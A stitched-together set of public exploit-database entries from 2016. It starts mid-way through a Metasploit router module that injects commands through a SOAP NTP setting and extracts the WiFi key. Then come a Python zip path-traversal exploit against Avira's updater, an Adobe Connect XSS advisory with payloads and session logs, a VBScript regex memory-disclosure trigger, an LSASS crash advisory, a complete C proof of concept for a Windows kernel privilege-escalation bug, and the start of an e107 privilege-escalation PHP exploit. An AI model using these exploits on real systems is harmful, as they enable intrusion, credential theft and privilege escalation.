uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
data_cmd = @data_cmd_template % "#{cmd}"
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def get_wifi_key()
print_status("Getting the wifi key...")
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
data_cmd_template = "<?xml version=\"1.0\"?>"
data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd_template << " <SOAP-ENV:Body>"
data_cmd_template << " <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
data_cmd_template << " </u:GetSecurityKeys>"
data_cmd_template << " </SOAP-ENV:Body>"
data_cmd_template << "</SOAP-ENV:Envelope>"
data_cmd= data_cmd_template
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
/NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
return key
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
# Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response.
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks for " ../ "
# characters which makes it possible to do a path traversal and write anywhere in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached.
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\
# 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or
# system32 directory which will get loaded and we gain remote command execution.
# 4. Open avira free antivirus
# 5. Go to update -> Manual Update
# 6. Select the malicious file
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC:
#!/usr/bin/python -w
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"
# Fix:
# Update to the latest version.
Document Title:
===============
Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1838
Security ID: PSIRT-5180
Bulletin: https://helpx.adobe.com/security/products/connect/apsb16-35.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7851
Public News Article: http://www.securityweek.com/adobe-patches-9-flash-player-flaws-reported-zdi
CVE-ID:
=======
CVE-2016-7851
Release Date:
=============
2016-11-09
Vulnerability Laboratory ID (VL-ID):
====================================
1838
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:
===============================
Whether it is a smartphone or tablet app, a game, a video, a digital magazine, a website, or an online experience,
chances are that it was touched by Adobe technology. Our tools and services enable our customers to create
groundbreaking digital content, deploy it across media and devices, and then continually measure and optimize it
based on user data. By providing complete solutions that combine digital media creation with data-driven marketing,
we help businesses improve their communications, strengthen their brands, and ultimately achieve greater business success.
(Copy of the Vendor Homepage: http://www.adobe.com/aboutadobe/)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability in the Adobe Connect online web-application and v9.5.6 windows software.
Vulnerability Disclosure Timeline:
==================================
2016-04-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-04-28: Vendor Notification (PSIRT Adobe Security Team)
2016-04-29: Vendor Response/Feedback (PSIRT Adobe Security Team)
2016-10-20: Vendor Fix/Patch (Adobe Service Developer Team)
2016-11-08: Security Acknowledgements (Adobe Security Team)
2016-11-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Adobe Systems
Product: Adobe Connect - Online Service (Web-Application) 2016 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation and xss vulnerability has been discovered in the Adobe Connect online web-application and v9.5.6 windows software.
The input validation and filter issue allows remote attackers to inject own malicious script codes to the server-side of the vulnerable modules context.
The vulnerability is located in the `firstname`,`lastname` and `companyname` parameter of the `event_registration.html` file submit POST method request.
Remote attackers are able to inject own malicious script codes in the vulnerable parameters POST method request to manipulate the adobe connect events
service emails for the webinar registration module. The email body does not encode the input values and the registration is not restricted on inputs as
well, which results in the application-side script code execution. Attackers are also able to followup the webinar links with the injected credentials
which may be result in a second persistent script code execution as well. The injection point is the registration input form of the webinar in adobe
connect and the execution point occurs in the email body context of the admin@adobeconnect.com email address.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources
and persistent manipulation of affected or connected service module context.
Request Method(s): Inject
[+] POST
Vulnerable Module(s):
[+] Events - Webinar Registration Form
Vulnerable File(s):
[+] event_registration.html
Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] companyname
Affected Module(s):
[+] (admin@adobeconnect.com)
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open your mailbox and click to the portals webinar email for administrators
2. Surf to the signup registration of adobe connect next to the events reck
3. Inject to the firstname, lastname and companyname your own script code payload
4. Submit the POST request to get activated for the webinar to hackerone via adobe connect
5. Check the local input of the registered account
6. The script code payloads of the name values are replied by the email service without secure encode
Note: The execution of the payloads occurs directly after the arrival and view
7. Now choose in the email the link to the webinar that is connected to the name values
8. Join the channel and write a message for interaction
9. The code executes in several sections of the webinar adobe connect events service with persistent vector
10. Successful reproduce of the both application-side vulnerabilities in adobe via hackerone!
PoC: event_registration.html
<div style="font-size: 12pt;color: #1d1d1d;font-family: Tahoma;font-style: normal;background-color: #FFFFFF;">
<p>>"<[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]></p>
<p>We are pleased to confirm your registration for The Art and Science of Bug Bounty Triage - April 28, 2016. We look forward to your participation in the event.</p>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://events-na1.adobeconnect.com/content/connect/connect-action?sco-id=2159915051
Mime Type[text/html]
Request Header:
Host[events-na1.adobeconnect.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
Referer[https://events-na1.adobeconnect.com/content/connect/c1/2152090704/en/events/event/shared/2159889590/event_registration.html?sco-id=2159915051&campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2&_charset_=utf-8]
Cookie[2159915051_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; connectevent_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; BREEZESESSION=na1breezpuz9xczd47kqnkqt; time-zone=Europe%2FBerlin; s_cc=true; s_sq=acnapvtpyd8zd0ka1b3qdt5jp4i76%3D%2526pid%253Dhttps%25253A%25252F%25252Fevents-na1.adobeconnect.com%25252Fcontent%25252Fconnect%25252Fc1%25252F2152090704%25252Fen%25252Fevents%25252Fevent%25252Fshared%25252F2159889590%25252Fevent_registration.html%25253Fsco-id%25253D2159915051%252526campaign-id%25253DDG-EM-Art%25252520of%25252520Triage-2Q2016-2%252526_charset_%25253Dutf-8%2526oid%253Dfunctiononclick(event)%25257BregFormSubmit()%25253B%25257D%2526oidt%253D2%2526ot%253DA]
Connection[keep-alive]
POST-Daten:
2159915054[Yes]
2159915055[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
2159915056[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
2159915057[adasfaf+asfasdfasfasfasdfsdfs]
login[bkm%40evolution-sec.com]
first-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
last-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
campaign-id[DG-EM-Art%2520of%2520Triage-2Q2016-2]
sco-id[2159915051]
reg-form-back[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html]
reg-form-success[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.result.html]
action[event-register]
_charset_[UTF-8]
login-uri[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.login.html%3Flogin-ok%3D%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html%26sco-id%3D2159915051]
set-lang[en]
reg-confirm-page[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fregistration_confirm.html]
Response Header:
Connection[Keep-Alive]
Server[Day-Servlet-Engine/4.1.24]
Content-Type[text/html;charset=UTF-8]
Date[Wed, 27 Apr 2016 08:56:07 GMT]
Transfer-Encoding[chunked]
Set-Cookie[2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connectconnectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect]
Reference(s):
https://events-na1.adobeconnect.com/
https://events-na1.adobeconnect.com/content/
https://events-na1.adobeconnect.com/content/connect/
https://events-na1.adobeconnect.com/content/connect/connect-action
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname, lastname and companyname input fields in
the registration file POST method request.
Dissallow the usage of special chars and restrict the input to prevent further script code injection attacks.
Encode the email body context of the adobe connect service mails after the registration. Block script code tags or escape and encode them as well.
Please follow the instructions in the adobe security bulletin to resolve the issue - Adobe Connect 9.5.7 windows desktop version.
URL: https://helpx.adobe.com/adobe-connect/release-note/adobe-connect-9-5-7-release-notes.html
Security Risk:
==============
The security risk of the application-side vulnerability in the events webinar web-application and windows desktop software is estimated as medium. (CVSS 3.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
<!--
Source: http://blog.skylined.nl/20161108001.html
Synopsis
A specially crafted script can cause the VBScript engine to read data beyond a memory block for use as a regular expression. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to disclose information stored after this memory block. This includes all versions of Microsoft Internet Explorer.
Known affected versions, attack vectors and mitigations
vbscript.dll
The issue is known to have affected versions 5.8.7600.16385 - 5.8.9600.16384, and both the 32- and 64-bit vbscript.dll binaries. It may also impact earlier versions as well as later versions as I am not sure exactly when the issue was addressed by Microsoft.
Windows Script Host
VBScript can be executed in the command line using cscript.exe/wscript.exe. An attacker would need to find a script running on a target machine that accepts an attacker supplied regular expression and a string, or be able to execute his/her own script. However, since the later should already provide an attacker with arbitrary code execution, no additional privileges are gained by exploiting this vuln.
Microsoft Internet Explorer
VBScript can be executed from a web-page; MSIE 8, 9, 10 and 11 were tested and are all affected. MSIE 11 requires a META tag to force it to render the page as an earlier version, as MSIE 11 attempts to deprecate VBScript (but fails, so why bother?). An attacker would need to get a target user to open a specially crafted web-page. Disabling scripting, particularly VBScript, should prevent an attacker from triggering the vulnerable code path. Enabling Enhanced Protected Mode appears to disable VBScript on my systems, but I have been unable to find documentation on-line that confirms this is by design.
Internet Information Server (IIS)
If Active Server Pages (ASP) are enabled, VBScript can be executed in Active Server Pages. An attacker would need to find an asp page that accepts an attacker supplied regular expression and a string, or be able to inject VBScript into an ASP page in order to trigger the vulnerability.
-->
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
<script language="VBScript">
Dim oRegExp
Set oRegExp = New RegExp
Sub RegExpSetPattern(sPattern)
oRegExp.Pattern = sPattern
End Sub
Function RegExpExecute(sData)
RegExpExecute = oRegExp.Execute(sData)
End Function
</script>
<script language="Javascript">
RegExpSetPattern("\u0504\u0706\u0908\u0B0A\u0D0C\u0F0E\u1110\u1312\u1514\u1716\u1918\u1B1A\\");
var oObject = RegExpExecute("23456789ABCD\0");
</script>
</head>
</html>
<!--
Description
When a regular expression is used to find matches in a string, it is first "compiled". During compilation, when a '\' escape character is encountered, the RegExpComp::PnodeParse function reads the next character to determine the type of escape sequence. However, if the last character in a regular expression is a '\' character, the code will read and use the terminating '\0' character as the second character in the escape sequence. This causes the code to ignore the end of the string and continue to compile whatever data is found beyond it as if it was part of the regular expression.
Exploit
The regular expressions string is stored in a BSTR, which means that the heap block in which it is stored may be larger than the regular expression. This means that if the heap block was used to store something else, then freed and reused for the regular expression, it may contain interesting information immediately following the regular expression. It also means that "heap feng-shui" can be used to control this as well as control the contents of the next heap block, which may also contain useful information.
This amount of control suggests that it may be possible to store this useful information compiled as if it was part of the regular expression. A number of functions can then be used to attempt to extract this information, such as matching to a string containing a sequence that contains all the possible values for the information: the resulting matches should reveal what information was compiled into the regular expression.
I did not implement such an attack, but here's one example of what it might look like:
Let's assume we can allocate 0x20 bytes of heap, of which the last four bytes contain a pointer into a dll and then free it.
0000 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? | ????????
0010 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? <<pointer>> | ??????ab
(In the above, "a" represents the least significant half of the address as a Unicode character and "b" the most significant half.)
Let's also assume we can allocate a heap block immediately following it in which we can control the first four bytes and set them to "]\0", or [5D 00 00 00].
0000 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? | ????????
0010 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? <<pointer>> | ??????ab
0020 5D 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? | ].??????
Finally, let's assume we can reallocate the freed heap block to store a regular expression "468ACE02|[\".
0000 18 00 00 00 34 00 36 00 38 00 3A 00 3C 00 3E 00 | ..468ACE
0010 30 00 32 00 7C 00 5B 00 5C 00 00 00 <<pointer>> | 02|[\.ab
0020 5D 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? | ].??????
When using the regular expression, it will effectively be compiled into "468ACE02|[\0ab]". Using this regular expression to find matches in a string that contains all valid Unicode characters should yield two matches: "a" and "b", in any order. You could then do the entire thing over and construct compiled regular expression that is effectively "468ACE02|(\0ab)" and matching this against the string "\0ab\0ba" to find out in which order "a" and "b" should be used to determine the value of the address.
Time-line
June 2014: This vulnerability was found through fuzzing, but I was unable to reproduce it outside of my fuzzing framework for unknown reasons.
April 2015: This vulnerability was found through fuzzing again.
April 2015: This vulnerability was submitted to ZDI.
May 2015: ZDI rejects the submission.
November 2016: The issue does not reproduce in the latest build of MSIE 11.
November 2016: Details of this issue are released.
-->
MS16-137: LSASS Remote Memory Corruption Advisory
Title: LSASS SMB NTLM Exchange Remote Memory Corruption
Version: 1.0
Issue type: Null Pointer Dereference
Authentication: Pre-Authenticated
Affected vendor: Microsoft
Release date: 8/11/2016
Discovered by: Laurent Gaffié
Advisory by: Laurent Gaffié
Issue status: Patch available
Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10.
=================================================
A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.
Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.
Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.
Technical details
-----------------
This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.
This allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.
eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004
eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
ntdll!RtlpWaitOnCriticalSection+0xdf:
7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????
STACK_TEXT:
00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf
00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer
00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds.
00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9
00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a
00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344
00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139
00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b
00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46
00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe
00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9
00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91
00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34
dt ntdll!_RTL_CRITICAL_SECTION
+0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG
+0x004 LockCount : Int4B
+0x008 RecursionCount : Int4B
+0x00c OwningThread : Ptr32 Void
+0x010 LockSemaphore : Ptr32 Void
+0x014 SpinCount : Uint4B
- LSASS NegpBuildMechListFromCreds sends a null pointer "creds" to NTDLL RtlEnterCriticalSection.
- RtlEnterCriticalSection is used with a null pointer, which triggers the crash.
Impact
------
Successful attempts will result in a remote system crash and possibly local privilege escalation.
Affected products
-----------------
Windows:
- XP
- Server 2003
- 7
- 8
- 2008
- 2012
- 10
Proof of concept
----------------
A proof of concept is available at the following URL:
https://github.com/lgandx/PoC/tree/master/LSASS
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40744.zip
This proof of concept is fully automated and includes non-vulnerable detection.
Solution
--------
Install the corresponding MS patch.
More details:
https://technet.microsoft.com/en-us/library/security/ms16-137.aspx
Response timeline
-----------------
* 17/09/2016 - Vendor notified, proof of concept sent.
* 28/09/2016 - Issue confirmed by MSRC
* 14/10/2016 - Vendor says he plan to release a patch in November, that is 1 month in advance of the scheduled 3 month.
* 08/11/2016 - Vendor release MS16-137.
* 08/11/2016 - This advisory released.
References
----------
* https://twitter.com/PythonResponder
* https://github.com/lgandx/Responder
/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255
Full Proof of Concept:
https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip
********************************************************************
Created: 2016-11-09 14:23:09
Filename: main.c
Author: root[at]TinySec.net
Version 0.0.0.1
Purpose: poc of cve-2016-0075
*********************************************************************
*/
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
//////////////////////////////////////////////////////////////////////////
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#undef DbgPrint
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList=NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));
va_start(VaList,Format);
_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
DbgPrintEx(77 , 0 , pszDbgBuff );
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
for ( i = 0; i < nCount ; i++)
{
_sim_key_down( VK_TAB);
_sim_key_up( VK_TAB);
Sleep(1000);
}
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return nFinalRet;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = {0};
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = {0};
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if ( 0 == RegisterClassExW(&stWC) )
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW|WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ( (UCHAR*)pAddress - 0x28 );
#else
pId = ( (UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );
DbgPrint("hWndChild = 0x%p\n" , hWndChild);
DebugBreak();
ShowWindow(hWndParent , SW_SHOWNORMAL);
SetParent(hWndChild , GetDesktopWindow() );
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild , TRUE);
_sim_alt_shift_esc();
while( GetMessage(&stMsg , NULL , 0 , 0) )
{
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
}
} while (FALSE);
if ( NULL != hWndParent )
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if ( NULL != hWndChild )
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );
return 0;
}
int __cdecl wmain(int nArgc, WCHAR** Argv)
{
do
{
or_address_value_4( (void*)0xFFFFFFFF );
} while (FALSE);
return 0;
}
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Datas from `$_POST['updated_data']` inside `usersettings.php` are not properly validated so we can set `user_admin`.
http://security.szurek.pl/e107-cms-211-privilege-escalation.html
2. Proof of Concept
<?php
/**
* e107 CMS 2.1.2 Privilege Escalation
* Kacper Szurek
* http://security.szurek.pl
*/
function hack($url, $login, $pass, $cookie){
